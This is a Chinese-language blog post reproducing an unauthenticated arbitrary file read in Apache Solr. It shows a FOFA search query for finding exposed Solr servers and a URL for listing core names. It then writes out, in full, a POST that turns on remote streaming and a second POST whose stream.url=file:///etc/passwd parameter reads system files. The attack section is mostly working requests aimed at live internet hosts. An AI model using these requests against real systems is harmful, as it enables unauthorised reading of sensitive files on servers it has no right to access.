天天看點

Apache Solr 任意檔案讀取漏洞複現Apache Solr 任意檔案讀取漏洞複現

Apache Solr 任意檔案讀取漏洞複現

前段時間hvv的時候,發現的oday漏洞,本着學習的精神,于是我想複現了一波。Apache Solr 存在的這個任意檔案讀取的漏洞,攻擊者可以在未授權的情況下擷取到目标系統的敏感檔案。

漏洞複現開始

首先我們用fofa搜尋

app="APACHE-Solr"
           
Apache Solr 任意檔案讀取漏洞複現Apache Solr 任意檔案讀取漏洞複現

然後打開首頁:

Apache Solr 任意檔案讀取漏洞複現Apache Solr 任意檔案讀取漏洞複現

再然後需要擷取到cores的配置資訊,怎麼擷取呢?

http://xxx/solr/admin/cores?indexInfo=false&wt=json
           
Apache Solr 任意檔案讀取漏洞複現Apache Solr 任意檔案讀取漏洞複現

這裡的name就是core_name.

再然後,通過抓包工具,向伺服器發送POST請求:

POST /solr/vergabe/config HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://4c4849ce-b8f1-4d41-b9b9-5fe6c19761d1
Content-Length: 84
Connection: close

{  "set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
           
Apache Solr 任意檔案讀取漏洞複現Apache Solr 任意檔案讀取漏洞複現

如果傳回包中出現“This response format is experimental. It is likely to change in the future.”,那麼說明,這個任意檔案讀取的漏洞存在。接下來就該構造檔案讀取的請求包了。

構造一下請求讀取的檔案:

POST /solr/vergabe/debug/dump?param=ContentStreams HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1

stream.url=file:///etc/passwd
           
Apache Solr 任意檔案讀取漏洞複現Apache Solr 任意檔案讀取漏洞複現

這個Apache Solr 任意檔案讀取漏洞的複現就算是完成了。

繼續閱讀